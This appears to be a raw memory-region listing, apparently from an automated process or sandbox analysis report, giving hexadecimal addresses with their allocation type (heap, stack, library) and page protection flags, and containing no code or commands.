page read and write
|
||
18EBB0E3000
|
heap
|
page read and write
|
||
153734EA000
|
heap
|
page read and write
|
||
28C87D78000
|
heap
|
page read and write
|
||
1619A3C0000
|
heap
|
page read and write
|
||
7FF847746000
|
trusted library allocation
|
page read and write
|
||
1BC8A9B0000
|
heap
|
page read and write
|
||
28C87D68000
|
heap
|
page read and write
|
||
28E2ED24000
|
heap
|
page read and write
|
||
14B35A98000
|
heap
|
page read and write
|
||
18EBB300000
|
heap
|
page read and write
|
||
B6EE8FC000
|
stack
|
page read and write
|
||
28C88B7F000
|
heap
|
page read and write
|
||
28C87C2A000
|
heap
|
page read and write
|
||
1436D9C5000
|
heap
|
page read and write
|
||
28C87DBE000
|
heap
|
page read and write
|
||
27258B11000
|
heap
|
page read and write
|
||
1BD20165000
|
heap
|
page read and write
|
||
7FF8478B0000
|
trusted library allocation
|
page read and write
|
||
28C87D8A000
|
heap
|
page read and write
|
||
28E2CECE000
|
heap
|
page read and write
|
||
28C88B64000
|
heap
|
page read and write
|
||
15372F20000
|
trusted library allocation
|
page read and write
|
||
28C87CA8000
|
heap
|
page read and write
|
||
1619A0E7000
|
heap
|
page execute and read and write
|
||
28C87CA8000
|
heap
|
page read and write
|
||
7FF73AE11000
|
unkown
|
page execute read
|
||
28C88660000
|
direct allocation
|
page read and write
|
||
1733EEF7000
|
heap
|
page read and write
|
||
18D018A0000
|
heap
|
page read and write
|
||
1F23A7AF000
|
heap
|
page read and write
|
||
1436DA26000
|
heap
|
page read and write
|
||
14B35AB4000
|
heap
|
page read and write
|
||
68D9B5C000
|
stack
|
page read and write
|
||
173422EC000
|
heap
|
page read and write
|
||
7FF8A8E6D000
|
unkown
|
page execute and read and write
|
||
28C87391000
|
heap
|
page read and write
|
||
28E2D49A000
|
heap
|
page read and write
|
||
28C87DA4000
|
heap
|
page read and write
|
||
16183A5F000
|
trusted library allocation
|
page read and write
|
||
14B35533000
|
heap
|
page read and write
|
||
28C87C77000
|
heap
|
page read and write
|
||
27258A40000
|
heap
|
page read and write
|
||
1E1A064E000
|
heap
|
page read and write
|
||
28C87DCA000
|
heap
|
page read and write
|
||
1F23C1B0000
|
direct allocation
|
page read and write
|
||
28C87C1F000
|
heap
|
page read and write
|
||
28C88B51000
|
heap
|
page read and write
|
||
28B6331B000
|
heap
|
page read and write
|
||
28C87D37000
|
heap
|
page read and write
|
||
27258BF0000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28E2CE39000
|
heap
|
page read and write
|
||
14B35A73000
|
heap
|
page read and write
|
||
173422D0000
|
heap
|
page read and write
|
||
28C88220000
|
direct allocation
|
page read and write
|
||
18EBB0E3000
|
heap
|
page read and write
|
||
18D018C1000
|
heap
|
page read and write
|
||
2238D07A000
|
heap
|
page read and write
|
||
19322550000
|
heap
|
page read and write
|
||
18EBB6A7000
|
heap
|
page read and write
|
||
7FF8A80F2000
|
unkown
|
page execute and read and write
|
||
28C87D93000
|
heap
|
page read and write
|
||
2BAD9811000
|
heap
|
page read and write
|
||
25CAEB00000
|
heap
|
page read and write
|
||
28C88BB5000
|
heap
|
page read and write
|
||
28C88B49000
|
heap
|
page read and write
|
||
28C8732E000
|
heap
|
page read and write
|
||
17341081000
|
heap
|
page read and write
|
||
7FF847990000
|
trusted library allocation
|
page read and write
|
||
1A6A1460000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
23315460000
|
heap
|
page read and write
|
||
1E1A004D000
|
heap
|
page read and write
|
||
14B35A91000
|
heap
|
page read and write
|
||
28E2CDE0000
|
heap
|
page read and write
|
||
28E2CEB6000
|
heap
|
page read and write
|
||
7FF8BFABB000
|
unkown
|
page execute and read and write
|
||
28813BF000
|
stack
|
page read and write
|
||
1E1A0039000
|
heap
|
page read and write
|
||
2BAD9811000
|
heap
|
page read and write
|
||
1436DBFA000
|
heap
|
page read and write
|
||
28C87A31000
|
heap
|
page read and write
|
||
28C87DA4000
|
heap
|
page read and write
|
||
16181EA8000
|
trusted library allocation
|
page read and write
|
||
28C87DBE000
|
heap
|
page read and write
|
||
E4DF7AF000
|
stack
|
page read and write
|
||
28C88842000
|
heap
|
page read and write
|
||
28C87D80000
|
heap
|
page read and write
|
||
272FBFF000
|
stack
|
page read and write
|
||
173422DC000
|
heap
|
page read and write
|
||
28C87AF1000
|
heap
|
page read and write
|
||
16181C70000
|
heap
|
page read and write
|
||
18EBB0D9000
|
heap
|
page read and write
|
||
7FF8B93D8000
|
unkown
|
page read and write
|
||
1C7FBA58000
|
heap
|
page read and write
|
||
7FF8479F0000
|
trusted library allocation
|
page read and write
|
||
28C88630000
|
direct allocation
|
page read and write
|
||
28C87686000
|
heap
|
page read and write
|
||
89021FF000
|
unkown
|
page read and write
|
||
14B35AA9000
|
heap
|
page read and write
|
||
7FF8479D0000
|
trusted library allocation
|
page read and write
|
||
28E2CDE8000
|
heap
|
page read and write
|
||
7FF7F7F14000
|
unkown
|
page read and write
|
||
C3EDAFF000
|
unkown
|
page read and write
|
||
1436DA32000
|
heap
|
page read and write
|
||
7FF847840000
|
trusted library allocation
|
page read and write
|
||
28C88690000
|
direct allocation
|
page read and write
|
||
28C87352000
|
heap
|
page read and write
|
||
1BC8A8C4000
|
heap
|
page read and write
|
||
28C87B5C000
|
heap
|
page read and write
|
||
161801AD000
|
heap
|
page read and write
|
||
1733EFBA000
|
heap
|
page read and write
|
||
54EBEFF000
|
stack
|
page read and write
|
||
7FF8478E0000
|
trusted library allocation
|
page read and write
|
||
153733CA000
|
heap
|
page read and write
|
||
14B35A9E000
|
heap
|
page read and write
|
||
28C88620000
|
direct allocation
|
page read and write
|
||
1B839BC0000
|
heap
|
page read and write
|
||
28C87C6C000
|
heap
|
page read and write
|
||
38F01FF000
|
stack
|
page read and write
|
||
28C87CE6000
|
heap
|
page read and write
|
||
1E1A0651000
|
heap
|
page read and write
|
||
28C87737000
|
heap
|
page read and write
|
||
28C88B2F000
|
heap
|
page read and write
|
||
15373040000
|
heap
|
page execute and read and write
|
||
28C8596B000
|
heap
|
page read and write
|
||
28C87DBE000
|
heap
|
page read and write
|
||
28C88A0D000
|
heap
|
page read and write
|
||
28C87C77000
|
heap
|
page read and write
|
||
1EE62895000
|
heap
|
page read and write
|
||
28C877C4000
|
heap
|
page read and write
|
||
16182B46000
|
trusted library allocation
|
page read and write
|
||
7FF8A8B15000
|
unkown
|
page execute and read and write
|
||
1619A130000
|
heap
|
page read and write
|
||
28C87D8E000
|
heap
|
page read and write
|
||
28C886D0000
|
direct allocation
|
page read and write
|
||
1E1A0040000
|
heap
|
page read and write
|
||
1BD201E7000
|
heap
|
page read and write
|
||
1E19FFC7000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
257A3125000
|
heap
|
page read and write
|
||
1BC8A870000
|
heap
|
page read and write
|
||
28C87DCA000
|
heap
|
page read and write
|
||
28C87D93000
|
heap
|
page read and write
|
||
14B35A9E000
|
heap
|
page read and write
|
||
28C87CA2000
|
heap
|
page read and write
|
||
28C87DAA000
|
heap
|
page read and write
|
||
28C87769000
|
heap
|
page read and write
|
||
28C87C3E000
|
heap
|
page read and write
|
||
14B37460000
|
heap
|
page read and write
|
||
28C8873A000
|
heap
|
page read and write
|
||
28C87D5B000
|
heap
|
page read and write
|
||
28E2CC50000
|
heap
|
page read and write
|
||
7FF8B8F8C000
|
unkown
|
page execute and read and write
|
||
28C87D99000
|
heap
|
page read and write
|
||
1CCD86D0000
|
heap
|
page read and write
|
||
28C8766D000
|
heap
|
page read and write
|
||
28E2CE5D000
|
heap
|
page read and write
|
||
1E1A1EF4000
|
heap
|
page read and write
|
||
28B63337000
|
heap
|
page read and write
|
||
7FF847832000
|
trusted library allocation
|
page read and write
|
||
28C8768F000
|
heap
|
page read and write
|
||
1BD201D0000
|
heap
|
page read and write
|
||
14B35A8E000
|
heap
|
page read and write
|
||
28C87CA0000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
7FF847900000
|
trusted library allocation
|
page read and write
|
||
20D5DD10000
|
heap
|
page read and write
|
||
1436DB90000
|
heap
|
page read and write
|
||
1436D9DF000
|
heap
|
page read and write
|
||
28E2CFBE000
|
heap
|
page read and write
|
||
28C88B49000
|
heap
|
page read and write
|
||
1E1A004D000
|
heap
|
page read and write
|
||
28C87789000
|
heap
|
page read and write
|
||
14B354F7000
|
heap
|
page read and write
|
||
1BC8A8B7000
|
heap
|
page read and write
|
||
28B63325000
|
heap
|
page read and write
|
||
28C87D30000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
1E1A0658000
|
heap
|
page read and write
|
||
14B35527000
|
heap
|
page read and write
|
||
2881437000
|
stack
|
page read and write
|
||
26243050000
|
heap
|
page read and write
|
||
1E1A0660000
|
heap
|
page read and write
|
||
22AE1396000
|
heap
|
page read and write
|
||
28C87C74000
|
heap
|
page read and write
|
||
1F23A74A000
|
heap
|
page read and write
|
||
234DAD70000
|
heap
|
page read and write
|
||
28C87322000
|
heap
|
page read and write
|
||
1CCD9F40000
|
heap
|
page read and write
|
||
28C877C9000
|
heap
|
page read and write
|
||
28C87631000
|
heap
|
page read and write
|
||
7FF8A81C2000
|
unkown
|
page execute and read and write
|
||
1E19FF30000
|
heap
|
page read and write
|
||
7FF8B8CC3000
|
unkown
|
page read and write
|
||
28C88B55000
|
heap
|
page read and write
|
||
21AD4790000
|
heap
|
page read and write
|
||
20C0AD65000
|
heap
|
page read and write
|
||
173422D0000
|
heap
|
page read and write
|
||
7FF8A86A9000
|
unkown
|
page read and write
|
||
7FF8B9070000
|
unkown
|
page readonly
|
||
1733EF13000
|
heap
|
page read and write
|
||
1E19FF50000
|
heap
|
page read and write
|
||
18EBB0F8000
|
heap
|
page read and write
|
||
7FF7F7F1E000
|
unkown
|
page read and write
|
||
28C88730000
|
heap
|
page read and write
|
||
28C8767C000
|
heap
|
page read and write
|
||
7FF8A8E63000
|
unkown
|
page execute and read and write
|
||
28C88110000
|
direct allocation
|
page read and write
|
||
28C87C27000
|
heap
|
page read and write
|
||
7FF847740000
|
trusted library allocation
|
page read and write
|
||
1F23A7C9000
|
heap
|
page read and write
|
||
28C87D7E000
|
heap
|
page read and write
|
||
14B35A80000
|
heap
|
page read and write
|
||
28E2D499000
|
heap
|
page read and write
|
||
1EE13691000
|
heap
|
page read and write
|
||
28E2CE76000
|
heap
|
page read and write
|
||
1436E129000
|
heap
|
page read and write
|
||
1436DB70000
|
heap
|
page read and write
|
||
28E2CE84000
|
heap
|
page read and write
|
||
28C87B3D000
|
heap
|
page read and write
|
||
28C87BFE000
|
heap
|
page read and write
|
||
28C87C3C000
|
heap
|
page read and write
|
||
2238CEC0000
|
heap
|
page read and write
|
||
4D5FFDF000
|
stack
|
page read and write
|
||
193225A0000
|
heap
|
page read and write
|
||
7FF8476BD000
|
trusted library allocation
|
page execute and read and write
|
||
1F23A729000
|
heap
|
page read and write
|
||
28C87D80000
|
heap
|
page read and write
|
||
14B35533000
|
heap
|
page read and write
|
||
28C88806000
|
heap
|
page read and write
|
||
7FF847A80000
|
trusted library allocation
|
page read and write
|
||
1E1A0660000
|
heap
|
page read and write
|
||
28C8733A000
|
heap
|
page read and write
|
||
1436E114000
|
heap
|
page read and write
|
||
80824FF000
|
unkown
|
page read and write
|
||
20C0AB20000
|
heap
|
page read and write
|
||
1BC8A970000
|
heap
|
page read and write
|
||
7FF847A90000
|
trusted library allocation
|
page read and write
|
||
28C88B2F000
|
heap
|
page read and write
|
||
28E2CFBB000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
1EE137B0000
|
heap
|
page read and write
|
||
1436DA90000
|
heap
|
page read and write
|
||
17342CD9000
|
heap
|
page read and write
|
||
7FF847878000
|
trusted library allocation
|
page read and write
|
||
241A8570000
|
heap
|
page read and write
|
||
272FAFF000
|
stack
|
page read and write
|
||
7FF8A8C63000
|
unkown
|
page execute and read and write
|
||
1B839C20000
|
heap
|
page read and write
|
||
28C88738000
|
heap
|
page read and write
|
||
7FF847874000
|
trusted library allocation
|
page read and write
|
||
28C87CF0000
|
heap
|
page read and write
|
||
7FF8479E4000
|
trusted library allocation
|
page read and write
|
||
7FF847AB0000
|
trusted library allocation
|
page read and write
|
||
28C87DA8000
|
heap
|
page read and write
|
||
1AC9F686000
|
heap
|
page read and write
|
||
182DF920000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
1619A21E000
|
heap
|
page read and write
|
||
28C87D97000
|
heap
|
page read and write
|
||
7FF7F7E81000
|
unkown
|
page execute read
|
||
7FF8B8F99000
|
unkown
|
page execute and read and write
|
||
1E19FE50000
|
heap
|
page read and write
|
||
7FF8A937D000
|
unkown
|
page execute and read and write
|
||
257A314C000
|
heap
|
page read and write
|
||
28C87D2A000
|
heap
|
page read and write
|
||
1E1A0030000
|
heap
|
page read and write
|
||
1F23A820000
|
direct allocation
|
page read and write
|
||
15310075000
|
trusted library allocation
|
page read and write
|
||
1EE628AA000
|
heap
|
page read and write
|
||
28C88F50000
|
direct allocation
|
page read and write
|
||
28C87B62000
|
heap
|
page read and write
|
||
1AC9F68B000
|
heap
|
page read and write
|
||
1436D9EF000
|
heap
|
page read and write
|
||
28C87322000
|
heap
|
page read and write
|
||
28E2D499000
|
heap
|
page read and write
|
||
28E2CEBC000
|
heap
|
page read and write
|
||
23315580000
|
heap
|
page read and write
|
||
C0A67BF000
|
stack
|
page read and write
|
||
7FF8479A0000
|
trusted library allocation
|
page read and write
|
||
28C8874D000
|
heap
|
page read and write
|
||
14B35A8F000
|
heap
|
page read and write
|
||
28C877E6000
|
heap
|
page read and write
|
||
1BF4F6C5000
|
heap
|
page read and write
|
||
1436D9F0000
|
heap
|
page read and write
|
||
28C876F1000
|
heap
|
page read and write
|
||
18EBB105000
|
heap
|
page read and write
|
||
28E2CFB0000
|
heap
|
page read and write
|
||
18EBB6AA000
|
heap
|
page read and write
|
||
18EBB110000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
7FF8A8853000
|
unkown
|
page read and write
|
||
7FF8BFABE000
|
unkown
|
page read and write
|
||
28C87C77000
|
heap
|
page read and write
|
||
7FF73AE10000
|
unkown
|
page readonly
|
||
7FF8B7EEB000
|
unkown
|
page read and write
|
||
16191CF1000
|
trusted library allocation
|
page read and write
|
||
20D5DEA3000
|
heap
|
page read and write
|
||
153737D3000
|
heap
|
page read and write
|
||
28C87C57000
|
heap
|
page read and write
|
||
1436D9E1000
|
heap
|
page read and write
|
||
28E2CE6E000
|
heap
|
page read and write
|
||
28C87C88000
|
heap
|
page read and write
|
||
1CCD8580000
|
heap
|
page read and write
|
||
28E2CE37000
|
heap
|
page read and write
|
||
28E2D481000
|
heap
|
page read and write
|
||
28C88758000
|
heap
|
page read and write
|
||
1E19FFCA000
|
heap
|
page read and write
|
||
ED9D1BB000
|
stack
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28C88B66000
|
heap
|
page read and write
|
||
4085FF000
|
stack
|
page read and write
|
||
28E2CFB4000
|
heap
|
page read and write
|
||
28CC3540000
|
heap
|
page read and write
|
||
17341164000
|
heap
|
page read and write
|
||
7FF8B8B3D000
|
unkown
|
page execute and read and write
|
||
1CCD86A8000
|
heap
|
page read and write
|
||
17341283000
|
heap
|
page read and write
|
||
28C8873A000
|
heap
|
page read and write
|
||
1436D9F8000
|
heap
|
page read and write
|
||
1EE62890000
|
heap
|
page read and write
|
||
1CCD86BE000
|
heap
|
page read and write
|
||
1733EFBF000
|
heap
|
page read and write
|
||
1619A522000
|
heap
|
page read and write
|
||
1436E129000
|
heap
|
page read and write
|
||
7FF847940000
|
trusted library allocation
|
page read and write
|
||
28C886A0000
|
direct allocation
|
page read and write
|
||
18A64C21000
|
heap
|
page read and write
|
||
1E1A0058000
|
heap
|
page read and write
|
||
153737A3000
|
heap
|
page read and write
|
||
1E1A0669000
|
heap
|
page read and write
|
||
1619A539000
|
heap
|
page read and write
|
||
14B35539000
|
heap
|
page read and write
|
||
18EBB10B000
|
heap
|
page read and write
|
||
1436DC70000
|
heap
|
page read and write
|
||
1436E112000
|
heap
|
page read and write
|
||
28E2D49F000
|
heap
|
page read and write
|
||
1C7FBA61000
|
heap
|
page read and write
|
||
7FF847850000
|
trusted library allocation
|
page execute and read and write
|
||
F134E5000
|
stack
|
page read and write
|
||
4B4C0F9000
|
stack
|
page read and write
|
||
7FF7F7EF0000
|
unkown
|
page readonly
|
||
7FF847A40000
|
trusted library allocation
|
page read and write
|
||
1E1A0652000
|
heap
|
page read and write
|
||
28C8768B000
|
heap
|
page read and write
|
||
18EBB6AA000
|
heap
|
page read and write
|
||
7FF8A8222000
|
unkown
|
page execute and read and write
|
||
28C87D8C000
|
heap
|
page read and write
|
||
28C87CB8000
|
heap
|
page read and write
|
||
28C87D68000
|
heap
|
page read and write
|
||
18EBB105000
|
heap
|
page read and write
|
||
28C88A2F000
|
heap
|
page read and write
|
||
1E1A1EF4000
|
heap
|
page read and write
|
||
14B35510000
|
heap
|
page read and write
|
||
B4AF87F000
|
stack
|
page read and write
|
||
80825FF000
|
stack
|
page read and write
|
||
18EBB818000
|
heap
|
page read and write
|
||
28C87B75000
|
heap
|
page read and write
|
||
28C87F90000
|
direct allocation
|
page read and write
|
||
28C886D0000
|
direct allocation
|
page read and write
|
||
28C87C61000
|
heap
|
page read and write
|
||
16181B00000
|
trusted library allocation
|
page read and write
|
||
1F23A5A0000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
14B35528000
|
heap
|
page read and write
|
||
28C87D9D000
|
heap
|
page read and write
|
||
7FF8B9840000
|
unkown
|
page readonly
|
||
28C88B85000
|
heap
|
page read and write
|
||
153715DF000
|
heap
|
page read and write
|
||
1CCD86BE000
|
heap
|
page read and write
|
||
28C88758000
|
heap
|
page read and write
|
||
14B35500000
|
heap
|
page read and write
|
||
7FF7F7F0A000
|
unkown
|
page read and write
|
||
1EE628C0000
|
heap
|
page read and write
|
||
28E2CE3D000
|
heap
|
page read and write
|
||
20D5DDF0000
|
heap
|
page read and write
|
||
BF7F67F000
|
stack
|
page read and write
|
||
28C88A0A000
|
heap
|
page read and write
|
||
17342252000
|
heap
|
page read and write
|
||
161832BE000
|
trusted library allocation
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
51AD87F000
|
stack
|
page read and write
|
||
6AB0AFF000
|
unkown
|
page read and write
|
||
28C88DE6000
|
heap
|
page read and write
|
||
28C8875D000
|
heap
|
page read and write
|
||
28C88B69000
|
heap
|
page read and write
|
||
28C88741000
|
heap
|
page read and write
|
||
1436DBFA000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
16191F70000
|
trusted library allocation
|
page read and write
|
||
28E2D484000
|
heap
|
page read and write
|
||
257A3108000
|
heap
|
page read and write
|
||
15371670000
|
heap
|
page read and write
|
||
28C87DBE000
|
heap
|
page read and write
|
||
1C7FBC50000
|
heap
|
page read and write
|
||
14B35450000
|
heap
|
page read and write
|
||
1436D9EC000
|
heap
|
page read and write
|
||
28C87B5C000
|
heap
|
page read and write
|
||
7FF847AF0000
|
trusted library allocation
|
page read and write
|
||
28E2CE8B000
|
heap
|
page read and write
|
||
7FF8B8F71000
|
unkown
|
page execute and read and write
|
||
17342283000
|
heap
|
page read and write
|
||
1619A0F0000
|
heap
|
page read and write
|
||
28C87D20000
|
heap
|
page read and write
|
||
28C87D7B000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
18EBD0A1000
|
heap
|
page read and write
|
||
266C3EB0000
|
heap
|
page read and write
|
||
28C87C28000
|
heap
|
page read and write
|
||
18EBB6AB000
|
heap
|
page read and write
|
||
28C88B3F000
|
heap
|
page read and write
|
||
12FA37F000
|
stack
|
page read and write
|
||
7FF8479F8000
|
trusted library allocation
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
14B3551C000
|
heap
|
page read and write
|
||
8243FF000
|
unkown
|
page read and write
|
||
1E1A0020000
|
heap
|
page read and write
|
||
28C88852000
|
heap
|
page read and write
|
||
16180030000
|
heap
|
page read and write
|
||
1F23A7E3000
|
heap
|
page read and write
|
||
4B4BBDF000
|
stack
|
page read and write
|
||
1436F9B1000
|
heap
|
page read and write
|
||
28C882A0000
|
direct allocation
|
page read and write
|
||
1AC9F696000
|
heap
|
page read and write
|
||
1436D9FF000
|
heap
|
page read and write
|
||
17340D4C000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
7FF8B7EEE000
|
unkown
|
page readonly
|
||
48A35FF000
|
stack
|
page read and write
|
||
28C873C5000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
1436D9D6000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
F134E2000
|
stack
|
page read and write
|
||
1436DBB0000
|
trusted library allocation
|
page read and write
|
||
15372F00000
|
heap
|
page readonly
|
||
1E1A1EE2000
|
heap
|
page read and write
|
||
7FF847692000
|
trusted library allocation
|
page read and write
|
||
199D3940000
|
heap
|
page read and write
|
||
28C88794000
|
heap
|
page read and write
|
||
14B35525000
|
heap
|
page read and write
|
||
20C0AC61000
|
heap
|
page read and write
|
||
28C877D5000
|
heap
|
page read and write
|
||
1C7FB9C0000
|
heap
|
page read and write
|
||
15373A10000
|
heap
|
page read and write
|
||
27258A20000
|
heap
|
page read and write
|
||
16181AD0000
|
trusted library allocation
|
page read and write
|
||
7FF847980000
|
trusted library allocation
|
page read and write
|
||
7FF847970000
|
trusted library allocation
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28C88AAB000
|
heap
|
page read and write
|
||
14B37322000
|
heap
|
page read and write
|
||
18EBB801000
|
heap
|
page read and write
|
||
1436F9C4000
|
heap
|
page read and write
|
||
173422E4000
|
heap
|
page read and write
|
||
26CD27D8000
|
heap
|
page read and write
|
||
28C88B5F000
|
heap
|
page read and write
|
||
22AE13C1000
|
heap
|
page read and write
|
||
28E2CE65000
|
heap
|
page read and write
|
||
28C87D25000
|
heap
|
page read and write
|
||
1436E10C000
|
heap
|
page read and write
|
||
28C88B6F000
|
heap
|
page read and write
|
||
7FF8B9F76000
|
unkown
|
page execute and write copy
|
||
28C87C68000
|
heap
|
page read and write
|
||
28C87C00000
|
heap
|
page read and write
|
||
7FF847A10000
|
trusted library allocation
|
page read and write
|
||
14B35A75000
|
heap
|
page read and write
|
||
2720DC10000
|
heap
|
page read and write
|
||
28C87B7C000
|
heap
|
page read and write
|
||
14B3553E000
|
heap
|
page read and write
|
||
199D399D000
|
heap
|
page read and write
|
||
28C87701000
|
heap
|
page read and write
|
||
1AC9F4E0000
|
heap
|
page read and write
|
||
24FFEFF000
|
stack
|
page read and write
|
||
1F23A7C2000
|
heap
|
page read and write
|
||
161832C7000
|
trusted library allocation
|
page read and write
|
||
1E1A0669000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
21D4D9E0000
|
heap
|
page read and write
|
||
18EBB818000
|
heap
|
page read and write
|
||
21AD4641000
|
heap
|
page read and write
|
||
24FFCFC000
|
stack
|
page read and write
|
||
7FF847840000
|
trusted library allocation
|
page read and write
|
||
1E1A0016000
|
heap
|
page read and write
|
||
1C7FB9A0000
|
heap
|
page read and write
|
||
1436D9FD000
|
heap
|
page read and write
|
||
1733EFC9000
|
heap
|
page read and write
|
||
28C88A14000
|
heap
|
page read and write
|
||
17342261000
|
heap
|
page read and write
|
||
288107E000
|
stack
|
page read and write
|
||
28C88B66000
|
heap
|
page read and write
|
||
1E19FF70000
|
trusted library allocation
|
page read and write
|
||
1436D9E9000
|
heap
|
page read and write
|
||
234DABC0000
|
heap
|
page read and write
|
||
40847F000
|
stack
|
page read and write
|
||
7FF8476EC000
|
trusted library allocation
|
page execute and read and write
|
||
1AC9F6BA000
|
heap
|
page read and write
|
||
1BF4F6C0000
|
heap
|
page read and write
|
||
28C882AC000
|
direct allocation
|
page read and write
|
||
8FA42FF000
|
unkown
|
page read and write
|
||
28C88620000
|
direct allocation
|
page read and write
|
||
1EE629A0000
|
heap
|
page read and write
|
||
28C88B6F000
|
heap
|
page read and write
|
||
28C87C54000
|
heap
|
page read and write
|
||
21AD4641000
|
heap
|
page read and write
|
||
28C858FE000
|
heap
|
page read and write
|
||
28C88B55000
|
heap
|
page read and write
|
||
28E2CEB3000
|
heap
|
page read and write
|
||
7FF8B9061000
|
unkown
|
page execute and read and write
|
||
18EBB0F8000
|
heap
|
page read and write
|
||
1436DA03000
|
heap
|
page read and write
|
||
28C88620000
|
direct allocation
|
page read and write
|
||
17342251000
|
heap
|
page read and write
|
||
28E2D478000
|
heap
|
page read and write
|
||
7FF847860000
|
trusted library allocation
|
page execute and read and write
|
||
28C87BFE000
|
heap
|
page read and write
|
||
193223A0000
|
heap
|
page read and write
|
||
28E2CE32000
|
heap
|
page read and write
|
||
28C87AFF000
|
heap
|
page read and write
|
||
1C7FBB40000
|
heap
|
page read and write
|
||
18EBD0B4000
|
heap
|
page read and write
|
||
28C858B0000
|
heap
|
page read and write
|
||
17341166000
|
heap
|
page read and write
|
||
7FF8B8B39000
|
unkown
|
page execute and read and write
|
||
28C87789000
|
heap
|
page read and write
|
||
28C881C0000
|
direct allocation
|
page read and write
|
||
7FF8A8237000
|
unkown
|
page execute and read and write
|
||
20C0AC51000
|
heap
|
page read and write
|
||
153737B0000
|
heap
|
page read and write
|
||
28E2CE7E000
|
heap
|
page read and write
|
||
21AD4641000
|
heap
|
page read and write
|
||
28C88620000
|
direct allocation
|
page read and write
|
||
4D5CB7F000
|
stack
|
page read and write
|
||
1619A47C000
|
heap
|
page read and write
|
||
257A312B000
|
heap
|
page read and write
|
||
1E1A004A000
|
heap
|
page read and write
|
||
28E2CE23000
|
heap
|
page read and write
|
||
28C88758000
|
heap
|
page read and write
|
||
1436F9B4000
|
heap
|
page read and write
|
||
7FF73AE3B000
|
unkown
|
page readonly
|
||
234DAF30000
|
heap
|
page read and write
|
||
199D399B000
|
heap
|
page read and write
|
||
7FF8A825C000
|
unkown
|
page execute and read and write
|
||
28C88B6F000
|
heap
|
page read and write
|
||
1E1A066C000
|
heap
|
page read and write
|
||
14B35AA9000
|
heap
|
page read and write
|
||
28C8776C000
|
heap
|
page read and write
|
||
1436D9F8000
|
heap
|
page read and write
|
||
28C88B34000
|
heap
|
page read and write
|
||
28C87354000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28C88F80000
|
trusted library allocation
|
page read and write
|
||
28C87C90000
|
heap
|
page read and write
|
||
28C88B34000
|
heap
|
page read and write
|
||
28C87C74000
|
heap
|
page read and write
|
||
18EBB080000
|
heap
|
page read and write
|
||
1619A170000
|
heap
|
page read and write
|
||
1D608350000
|
heap
|
page read and write
|
||
4D5FF5F000
|
stack
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
14B35A88000
|
heap
|
page read and write
|
||
28C87DCA000
|
heap
|
page read and write
|
||
1436DBB0000
|
trusted library allocation
|
page read and write
|
||
28C87DBE000
|
heap
|
page read and write
|
||
F134D4000
|
stack
|
page read and write
|
||
18D01800000
|
heap
|
page read and write
|
||
18EBB6A2000
|
heap
|
page read and write
|
||
15371740000
|
heap
|
page read and write
|
||
1F23DC90000
|
direct allocation
|
page read and write
|
||
14B35A7E000
|
heap
|
page read and write
|
||
28C87CA8000
|
heap
|
page read and write
|
||
7FF8B8B42000
|
unkown
|
page read and write
|
||
28C87E29000
|
heap
|
page read and write
|
||
28E2D4A9000
|
heap
|
page read and write
|
||
1AC9F6AD000
|
heap
|
page read and write
|
||
1E19FFF2000
|
heap
|
page read and write
|
||
1BF4F6F1000
|
heap
|
page read and write
|
||
1AC9F6AD000
|
heap
|
page read and write
|
||
D6C9FFF000
|
stack
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
18EBB818000
|
heap
|
page read and write
|
||
28C87C73000
|
heap
|
page read and write
|
||
7FF8BA241000
|
unkown
|
page execute read
|
||
241A8740000
|
heap
|
page read and write
|
||
14B35533000
|
heap
|
page read and write
|
||
1F23DD39000
|
direct allocation
|
page read and write
|
||
20C0AD70000
|
heap
|
page read and write
|
||
257A314F000
|
heap
|
page read and write
|
||
1619A2F0000
|
heap
|
page execute and read and write
|
||
1CCD86A0000
|
heap
|
page read and write
|
||
173412A0000
|
heap
|
page read and write
|
||
28C88700000
|
direct allocation
|
page read and write
|
||
7FF8A8247000
|
unkown
|
page execute and read and write
|
||
8242FB000
|
stack
|
page read and write
|
||
28C88A33000
|
heap
|
page read and write
|
||
28C88A37000
|
heap
|
page read and write
|
||
15372FA3000
|
trusted library allocation
|
page read and write
|
||
28C876B1000
|
heap
|
page read and write
|
||
E8CB87F000
|
stack
|
page read and write
|
||
17342268000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28C88610000
|
direct allocation
|
page read and write
|
||
2545B398000
|
heap
|
page read and write
|
||
1E1A2020000
|
heap
|
page read and write
|
||
7FF8A851B000
|
unkown
|
page execute and read and write
|
||
1CCD86D0000
|
heap
|
page read and write
|
||
1619A421000
|
heap
|
page read and write
|
||
14B37334000
|
heap
|
page read and write
|
||
28E2CE44000
|
heap
|
page read and write
|
||
28C886E0000
|
direct allocation
|
page read and write
|
||
173421E4000
|
heap
|
page read and write
|
||
1E1A0679000
|
heap
|
page read and write
|
||
16191F88000
|
trusted library allocation
|
page read and write
|
||
18A64C21000
|
heap
|
page read and write
|
||
1A6A1454000
|
heap
|
